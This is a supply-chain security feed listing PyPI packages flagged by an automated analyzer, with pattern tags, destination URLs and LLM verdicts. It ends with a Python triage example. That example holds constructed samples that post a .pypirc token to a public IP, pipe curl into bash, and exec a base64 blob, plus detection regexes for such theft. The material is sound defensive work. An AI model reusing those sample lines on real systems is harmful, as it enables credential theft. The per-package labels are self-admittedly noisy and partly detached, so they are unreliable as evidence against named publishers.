
incidents.cremit.io

A reference feed of real-world Non-Human Identity (NHI) credential leak incidents. Maintained by Cremit.

status: monitor active · build: 2026-07-04 · origin: cremit · seoul, kr · license: CC BY 4.0

© 2026 Cremit. content reuse encouraged with attribution.

Caught packages

Every package the analyzer pipeline classified as auto-published. Sort by weekly downloads to surface the highest-blast-radius cases first. Each entry shows the static extraction (credential-read patterns as "steals", URL literals as "sends to", and the matched pattern tags) and, where the LLM pass ran, its verdict with a confidence score. The two layers can disagree: the extraction records every URL literal it finds, so a license link or a docs URL can surface as a "destination", while the note beneath the entry is the triage of that extraction (known-vendor host, public IP, remote-exec shape). Read the note and the verdict together before acting on a "sends to" line.

caught total: 1,272 (0 in last 7 days)
top by downloads: disposable-email-domains, 1.1M/wk
top pattern: reads-env-vars, 185 hits
ecosystems indexed: npm, pypi, gh-actions, vscode, huggingface
29 results · indexed 2026-06-07
  • AUTO-PUBLISHED · pypi · 2026-06-06
    disposable-email-domains (2 versions · 0.0.196 → 0.0.197)
    A set of disposable email domains
    steals → Chromium logins
    patterns: reads-chromium-creds, webhook-bin, archive-then-upload, clipboard-access
    weekly: 1.1M/wk · h-score: 20

  • AUTO-PUBLISHED · pypi · 2026-04-08 · MAL-2026-4174
    durabletask@1.4.0
    A Durable Task Client SDK for Python
    steals → Chromium logins
    patterns: reads-chromium-creds, py-pip-install-runtime, archive-then-upload
    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
    weekly: 103K/wk · llm verdict: benign 0.85

  • AUTO-PUBLISHED · pypi · 2026-06-04
    sealights-python-agent@2.10.10
    by Tricentis Sealights
    Tricentis Sealights Python Agent - Quality Intelligence and Code Coverage
    steals → Chromium logins → sends to https://packaging.python.org/en/latest/distributing.html
    patterns: py-pip-install-runtime, reads-env-vars, py-urllib-request, fs-recursive-read, reads-homedir, reads-system-info, webhook-bin, py-socket-connect

  • AUTO-PUBLISHED · pypi · 2026-05-19 · MAL-2026-4765
    qontract-reconcile@0.10.2.dev658
    Collection of tools to reconcile services with their desired state as defined in the app-interface DB.
    steals → AWS keys, Chromium logins
    patterns: reads-env-vars, reads-aws-creds, base64-decode, reads-chromium-creds, py-requests-post, child-process-spawn, py-urllib-request, reads-homedir, +2

  • AUTO-PUBLISHED · pypi · 2026-05-22 · MAL-2026-4774
    vulndify-mcp-server@0.3.0
    A minimal MCP server demo exposing a hello tool.
    → sends to http://10.37.1.177/v1/chat-messages
    patterns: base64-decode, child-process-spawn, curl-pipe-bash-unverified, py-requests-post
    → No suspicious destination, no remote-exec shape — extraction empty.
    weekly: 312/wk · llm verdict: benign

  • AUTO-PUBLISHED · pypi · 2026-06-07
    domain-admin@1.6.78
    by Peng Shiyu
    a domain ssl cert admin
    steals → Chromium logins → sends to https://pypi.org/simple
    patterns: child-process-spawn, py-pip-install-runtime, reads-env-vars, py-requests-post, py-socket-connect, long-base64-literal, long-hex-literal, clipboard-access

  • AUTO-PUBLISHED · pypi · 2026-06-03
    magenta-rt@2.0.2
    by Google LLC
    Real-time music generation models.
    steals → GCP creds, AI API keys → sends to http://www.apache.org/licenses/LICENSE-2.0
    patterns: py-pip-install-runtime, reads-env-vars, reads-homedir, eval-dynamic, reads-gcp-creds, reads-ai-api-keys

  • AUTO-PUBLISHED · pypi · 2026-06-04
    azure-genome@0.1.4
    A Python package for Azure Genome.
    steals → Chromium logins → sends to https://github.com/python/cpython/pull/119891
    patterns: py-requests-post, reads-env-vars, eval-dynamic, child-process-spawn, reads-homedir, reads-system-info, webhook-bin, py-socket-connect, +6

  • AUTO-PUBLISHED · pypi · 2026-06-04
    byn@0.0.1
    by Sandeep Baynes
    Name reserved for byn — a local-first secure secrets vault & credential manager (a Go CLI). Install via `go install`, Homebrew, or https://github.com/sandeepbaynes/byn.
    → sends to raw.githubusercontent.com · https://raw.githubusercontent.com/sandeepbaynes/byn/main…
    patterns: curl-pipe-bash
    → Static analyzer matched curl-pipe-bash: unambiguous remote-code-execution shape in the install path.
    weekly: — · llm verdict: malicious 0.95

  • AUTO-PUBLISHED · pypi · 2026-06-04
    epyt@2.3.5.1
    by Marios S. Kyriakou
    EPyT: An EPANET-Python Toolkit for Smart Water Network Simulations. The EPyT is inspired by the EPANET-Matlab Toolkit.
    steals → PyPI token → sends to https://github.com/OpenWaterAnalytics/EPANET
    patterns: reads-pypirc, fs-recursive-read, http-to-public-ip, child-process-spawn, py-sys-platform-branch
    → Credential read (reads-pypirc) paired with http-to-public-ip destination — classic exfiltration signature.

  • AUTO-PUBLISHED · pypi · 2026-06-03
    quasarr@4.5.3
    Quasarr connects JDownloader with Radarr, Sonarr and Magazarr. It also decrypts links protected by CAPTCHAs.
    steals → Chromium logins → sends to https://github.com/rix1337
    patterns: reads-env-vars, child-process-spawn, base64-decode, py-requests-post, reads-chromium-creds, py-socket-connect, hex-decode, discord-webhook, +1

  • AUTO-PUBLISHED · pypi · 2026-05-31
    cscc-glass-house@1.0.1
    Cloud Security Championship CI test utilities
    steals → Chromium logins → sends to https://webhook.site/52335eaa-cdad-436b-a67e-08481a95bd0e
    patterns: reads-chromium-creds, reads-env-vars, webhook-bin, py-requests-post
    → No suspicious destination, no remote-exec shape — no network destinations.
    weekly: —

  • AUTO-PUBLISHED · pypi · 2026-05-26 · MAL-2026-4814
    vectordb-engine@1.0.0
    by VectorDB Contributors
    High-performance vector similarity search with SIMD-optimized kernels
    patterns: reads-env-vars, reads-system-info, child-process-spawn, py-sys-platform-branch
    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
    weekly: — · llm verdict: benign 0.85

  • AUTO-PUBLISHED · pypi · 2026-05-18 · MAL-2026-4772
    txdpy@2026.5
    by 唐旭东
    → sends to api.fanyi.baidu.com · http://api.fanyi.baidu.com/api/trans/vip/translate?q={q}…
    patterns: eval-dynamic, child-process-spawn, reads-env-vars, py-requests-post
    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
    weekly: —

  • AUTO-PUBLISHED · pypi · 2026-05-15 · MAL-2026-4769
    soundsource@0.1.0
    Official Python SDK for the SoundSource API
    → sends to https://api.soundsource.example.com/v1
    patterns: reads-env-vars
    → No suspicious destination, no remote-exec shape — 2 other host(s).
    weekly: — · llm verdict: benign 0.85 · h-score: 75

  • AUTO-PUBLISHED · pypi · 2026-05-17 · MAL-2026-4767
    silly-logger@0.1.1
    just a silly logger :P
    → Excerpt too sparse to classify (no extractable code).
    weekly: — · llm verdict: uncertain 0.30 · h-score: 75 · size: 92.8 KB · versions: 6

  • AUTO-PUBLISHED · pypi · 2026-05-15 · MAL-2026-4766
    saas-common-lib-473815@2.6
    by Srinidhi Nagarajan
    Packaging all common functionalities
    patterns: reads-env-vars
    → No suspicious destination, no remote-exec shape — 1 other host(s).
    weekly: — · llm verdict: benign 0.85 · h-score: 75 · patterns: 1

  • AUTO-PUBLISHED · pypi · 2026-05-26 · MAL-2026-4821
    pywingui@6.0.1
    Intelligent Windows GUI Automation Framework (Compiled)
    → Excerpt too sparse to classify (no extractable code).
    weekly: — · llm verdict: uncertain 0.30 · h-score: 75 · size: 2.7 MB · versions: 57

  • AUTO-PUBLISHED · pypi · 2026-05-21 · MAL-2026-4760
    nvidia-nat-semantic-kernel@1.8.0a20260521
    by NVIDIA Corporation
    Subpackage for Semantic-Kernel integration in NeMo Agent Toolkit
    → Excerpt too sparse to classify (no extractable code).
    weekly: — · llm verdict: uncertain 0.30 · h-score: 75 · size: 55.5 KB · versions: 387

  • AUTO-PUBLISHED · pypi · 2026-05-26 · MAL-2026-4813
    noteparse@1.1.27
    by maoyuyan
    a package for parse html to noteinfo
    → sends to https://github.com/m294567571/noteparse.git
    patterns: public-github-push, reads-homedir, archive-then-upload, py-requests-post
    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
    weekly: —

  • AUTO-PUBLISHED · pypi · 2026-05-25 · MAL-2026-4755
    mathepy@7.9.0
    Module for Quick Calculations
    patterns: eval-dynamic, py-requests-post, py-pip-install-runtime
    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s), 1 other host(s).
    weekly: — · llm verdict: benign 0.85 · h-score: 75 · patterns: 3

  • AUTO-PUBLISHED · pypi · 2026-05-26 · MAL-2026-4795
    massive@2.8.0
    by massive.com
    Official Massive (formerly Polygon.io) REST and Websocket client.
    → sends to https://api.massive.com
    patterns: reads-env-vars
    → No suspicious destination, no remote-exec shape — 1 other host(s).
    weekly: — · llm verdict: benign 0.85 · h-score: 75

  • AUTO-PUBLISHED · pypi · 2026-05-18 · MAL-2026-4751
    glass-of-water@1.0.3
    by Your Name
    A simple utility wrapper for API access
    → Excerpt too sparse to classify (no extractable code).
    weekly: — · llm verdict: uncertain 0.30 · h-score: 79 · size: 2.1 KB · versions: 4

  • AUTO-PUBLISHED · pypi · 2026-05-26 · MAL-2026-4748
    eplang@8.0.0
    EPL - English Programming Language: write code in plain English. Build apps, web servers, and more.
    steals → AWS keys, GitHub PAT, Chromium logins → sends to http://localhost:11434
    patterns: child-process-spawn, fs-recursive-read, py-pip-install-runtime, py-urllib-request, clipboard-access

  • AUTO-PUBLISHED · pypi · 2026-05-25 · MAL-2026-4747
    edison-tools@0.1.17
    → sends to https://edison-k8.vercel.app/query
    patterns: reads-env-vars, py-requests-post, py-urllib-request
    → No suspicious destination, no remote-exec shape — 1 other host(s).
    weekly: — · llm verdict: benign 0.85

  • AUTO-PUBLISHED · pypi · 2026-05-18 · MAL-2026-4742
    aurapro-ui@3.2.5
    AuraPro UI
    patterns: oversize-tarball-skipped
    → No suspicious destination, no remote-exec shape — no network destinations.
    weekly: — · llm verdict: benign 0.85 · h-score: 75 · patterns: 1 · size: 82.5 MB

  • AUTO-PUBLISHED · pypi · 2026-05-17 · MAL-2026-4741
    aurafarmer@0.3.0
    PRO — Terminal AI Coding Agent by SPRUKY
    patterns: py-setup-cmdclass, py-urllib-request, child-process-spawn, py-requests-post
    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
    weekly: — · llm verdict: benign 0.85 · h-score: 75

  • AUTO-PUBLISHED · pypi · 2026-05-22
    agentforge-litellm@0.2.3
    by The AgentForge Authors
    LiteLLM router-based LLM provider for AgentForge — 100+ underlying providers through one interface
    patterns: py-pip-install-runtime
    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
    weekly: — · llm verdict: benign 0.85 · h-score: 100 · patterns: 1
  • AUTO-PUBLISHED · pypi · 2026-05-22
    easy-tdx@1.0.0
    by Justin Gu
    TDX (Tongdaxin) TCP-protocol market-data client; supports live quotes and reading offline local data
    patterns: archive-then-upload, http-to-public-ip, py-socket-connect, hex-decode, reads-env-vars, py-sys-platform-branch, child-process-spawn, py-pip-install-runtime
    → Hardcoded public IP destination: 180.153.18.170, 124.71.187.122, 180.153.18.171, 180.153.18.172, 119.147.212.81, 115.238.56.198, 115.238.90.165, 218.75.126.9, 47.107.75.159, 59.175.238.38, 110.41.147.114, 110.41.2.72, 101.33.225.16, 175.178.112.197, 175.178.128.227, 43.139.95.83, 124.223.163.242, 122.51.120.217, 150.158.160.2, 123.60.164.122, 111.229.247.189, 124.70.199.56, 62.234.50.143, 81.70.151.186, 82.156.214.79, 159.75.29.111, 43.139.18.171, 81.71.32.47, 122.51.232.182, 118.25.98.114, 121.36.225.169, 123.60.70.228, 123.60.73.44, 124.70.133.119, 124.71.187.72, 119.97.185.59, 129.204.230.128, 101.42.240.54, 124.71.9.153, 123.60.84.66, 111.230.186.52, 101.0.0.43 (not RFC1918 / loopback).
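
The notes under the entries above describe a small rule set: curl-pipe-bash is treated as an unambiguous remote-exec shape in the install path, a credential read paired with an http-to-public-ip destination is the exfiltration signature, an encoded blob fed to dynamic execution is fast-tracked, and everything else falls through to the benign template with its known-vendor and other host counts. The Python below is an added example that re-implements those rules as a standalone triage function so the precedence is visible; it is not Cremit's analyzer code. The regexes, the vendor allowlist, the rule order and the four setup.py fragments are assumptions constructed here. The two IP literals reuse addresses this page already labels (10.37.1.177 as RFC1918, 180.153.18.170 as public); the RFC1918 / loopback check uses the standard library's ipaddress module.

```python
"""Toy re-implementation of the triage notes printed under each entry above.

Added example, not Cremit's analyzer. The tag names follow this feed; the
regexes, the vendor allowlist and the precedence of the rules are assumptions
made for illustration.
"""
import ipaddress
import re

# Tag -> regex over the package source. Assumed patterns, not the feed's own.
TAG_PATTERNS = {
    "reads-pypirc": re.compile(r"\.pypirc"),
    "reads-env-vars": re.compile(r"os\.environ|getenv\("),
    "reads-aws-creds": re.compile(r"\.aws/credentials|AWS_SECRET_ACCESS_KEY"),
    "base64-decode": re.compile(r"b64decode\("),
    "eval-dynamic": re.compile(r"\b(?:eval|exec)\("),
    "curl-pipe-bash": re.compile(r"curl\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba)?sh\b"),
    "py-requests-post": re.compile(r"requests\.post\("),
    "child-process-spawn": re.compile(r"subprocess\.(?:Popen|run|call)\("),
}
# Only real credential stores count for the exfiltration pairing; reads-env-vars
# is the feed's most common tag and would pair with almost anything.
CRED_READ_TAGS = {"reads-pypirc", "reads-aws-creds"}
# Assumed allowlist of the hosts the feed's notes call "known-vendor".
KNOWN_VENDOR_HOSTS = {"pypi.org", "github.com", "raw.githubusercontent.com", "www.apache.org"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+|\[[0-9a-fA-F:]+\])(?::\d+)?")


def _as_ip(host):
    """Return an ip_address for a literal-IP host, else None."""
    try:
        return ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return None


def is_public_ip(host):
    """True for a literal IP that is not RFC1918 / loopback / link-local."""
    ip = _as_ip(host)
    return ip is not None and not (ip.is_private or ip.is_loopback or ip.is_link_local)


def classify_destinations(source):
    """Bucket every URL literal's host the way the entry notes count them."""
    buckets = {"known-vendor": [], "public-ip": [], "private-ip": [], "other": []}
    for host in dict.fromkeys(m.group(1).lower() for m in URL_RE.finditer(source)):
        if host in KNOWN_VENDOR_HOSTS:
            buckets["known-vendor"].append(host)
        elif _as_ip(host) is None:
            buckets["other"].append(host)
        elif is_public_ip(host):
            buckets["public-ip"].append(host)
        else:
            buckets["private-ip"].append(host)
    return buckets


def triage(source):
    """Apply the three fast-track rules in order, then fall back to the benign template."""
    tags = sorted(tag for tag, rx in TAG_PATTERNS.items() if rx.search(source))
    dests = classify_destinations(source)
    creds_hit = sorted(CRED_READ_TAGS & set(tags))
    if "curl-pipe-bash" in tags:
        verdict, note = "malicious", ("Static analyzer matched curl-pipe-bash: "
                                      "unambiguous remote-code-execution shape in the install path.")
    elif "base64-decode" in tags and "eval-dynamic" in tags:
        verdict, note = "malicious", ("Encoded payload + dynamic execution combo: "
                                      "embedded blob decoded and executed at install time. Fast-tracked.")
    elif dests["public-ip"] and creds_hit:
        verdict, note = "malicious", ("Credential read (%s) paired with http-to-public-ip destination %s: "
                                      "classic exfiltration signature."
                                      % (", ".join(creds_hit), ", ".join(dests["public-ip"])))
    else:
        verdict, note = "benign", ("No suspicious destination, no remote-exec shape: "
                                   "%d known-vendor host(s), %d other host(s)."
                                   % (len(dests["known-vendor"]), len(dests["other"])))
    return {"tags": tags, "destinations": dests, "verdict": verdict, "note": note}


# Constructed setup.py fragments (not real packages). The two IPs are ones this
# feed already labels: 10.37.1.177 as RFC1918, 180.153.18.170 as public.
SAMPLE_EXFIL = '''
import os, requests
token = open(os.path.expanduser("~/.pypirc")).read()
requests.post("http://180.153.18.170/collect", data={"t": token})
'''
SAMPLE_CURL = '''
import subprocess
subprocess.run("curl -fsSL https://raw.githubusercontent.com/example/x/main/install.sh | bash", shell=True)
'''
SAMPLE_BLOB = '''
import base64
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
'''
SAMPLE_BENIGN = '''
import os, requests
api_key = os.environ.get("EXAMPLE_API_KEY")
requests.post("https://pypi.org/simple", json={"k": api_key})
requests.post("http://10.37.1.177/v1/chat-messages", json={})
'''

if __name__ == "__main__":
    for name, src in [("exfil", SAMPLE_EXFIL), ("curl", SAMPLE_CURL),
                      ("blob", SAMPLE_BLOB), ("benign", SAMPLE_BENIGN)]:
        result = triage(src)
        print(name, result["verdict"], result["tags"], "\n  ->", result["note"])
```

The rule order matters: the benign fragment reads an environment variable and posts to two hosts, but one host is a known vendor and the other is RFC1918, so it never reaches the exfiltration rule, which is the same reason the feed's vulndify-mcp-server entry carries a benign verdict despite its 10.x destination. Swapping reads-env-vars into CRED_READ_TAGS would flip many of the benign entries above to malicious, which is the trade-off the feed's "top pattern: reads-env-vars, 185 hits" figure hints at.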

[Extraction residue: the per-entry stat cells (weekly downloads, LLM verdict, h-score, pattern count, tarball size, version count) for the rows above were detached from their entries and cannot be reassigned. Two detached analyzer notes survive without a package name: "Encoded payload + dynamic execution combo (event-stream / flatmap-stream shape) — embedded blob decoded and executed at install time. Fast-tracked." (llm verdict: malicious 0.92), and a pattern list beginning reads-github-tokens, reads-env-vars, reads-homedir, +11 with the benign template "No suspicious destination, no remote-exec shape — 1 known-vendor host(s), 2 other host(s)." (llm verdict: benign 0.85).]